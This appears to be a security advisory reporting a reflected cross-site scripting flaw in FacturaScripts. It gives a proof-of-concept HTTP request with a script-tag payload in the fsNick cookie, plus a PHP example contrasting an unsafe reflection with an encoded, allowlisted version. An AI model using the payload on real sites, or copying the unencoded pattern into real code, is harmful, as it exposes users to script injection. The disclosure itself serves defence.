Cross-site Scripting (XSS) via Cookie Value in neorazorx/facturascripts
May 4th 2022
An XSS can be triggered via a cookie value.
Cross-site Scripting (XSS) is a client-side code injection attack in which an attacker can execute malicious scripts in a legitimate website or web application. XSS occurs when a web application uses unvalidated or unencoded user input in the output it generates.
Proof of Concept
1. Go to a random page and intercept the request using BurpSuite.
2. Change the Cookie's Value of
3. The script tag will be reflected in the web page.
GET /facturascripts/ HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Cookie: fsNick=abc<script>alert(origin)</script>;fsLogkey=8EVl2Ac1dQMy0b5aDWgpvehmwNIkiSxuJ76HKZjLzCX9YBGTr4Utf3onPqsRFO;fsLang=en_EN;fsCompany=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: my.facturascripts.site
Connection: Keep-alive
- XSS Triggered
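The reflection shown in the request above, next to a hardened version, as an added PHP example that is not FacturaScripts code. The function names, the HTML fragment and the allowlist pattern for the nick are assumptions; the cookie value is the one from the request in this report, with fsLogkey left out.

```php
<?php
declare(strict_types=1);

// Added illustration, not FacturaScripts source. Function names, the markup
// and the allowlist pattern are assumptions made for this example.

/** Parse a raw Cookie header into name => value pairs. */
function parseCookieHeader(string $header): array
{
    $cookies = [];
    foreach (explode(';', $header) as $pair) {
        $parts = explode('=', trim($pair), 2);
        if (count($parts) === 2 && $parts[0] !== '') {
            $cookies[$parts[0]] = urldecode($parts[1]);
        }
    }
    return $cookies;
}

/** Vulnerable pattern: the cookie value is written into the HTML as-is. */
function renderUnsafe(array $cookies): string
{
    return '<span class="user">' . ($cookies['fsNick'] ?? '') . '</span>';
}

/** Hardened: reject unexpected nick values, then encode at output anyway. */
function renderSafe(array $cookies): string
{
    $nick = $cookies['fsNick'] ?? '';
    // Assumed nick format: 1-50 letters, digits, '_', '.', '-' or '@'.
    if (preg_match('/\A[A-Za-z0-9_.@-]{1,50}\z/', $nick) !== 1) {
        $nick = '';
    }
    return '<span class="user">'
        . htmlspecialchars($nick, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</span>';
}

// Cookie header taken from the request in this report (fsLogkey omitted).
$cookies = parseCookieHeader(
    'fsNick=abc<script>alert(origin)</script>;fsLang=en_EN;fsCompany=1'
);

echo renderUnsafe($cookies), PHP_EOL;           // unencoded reflection
echo renderSafe($cookies), PHP_EOL;             // value fails the allowlist
echo renderSafe(['fsNick' => 'admin']), PHP_EOL; // well-formed nick is kept
```

Validation and output encoding are kept as two separate layers so that a value that passes the allowlist is still encoded for the HTML context it is written into.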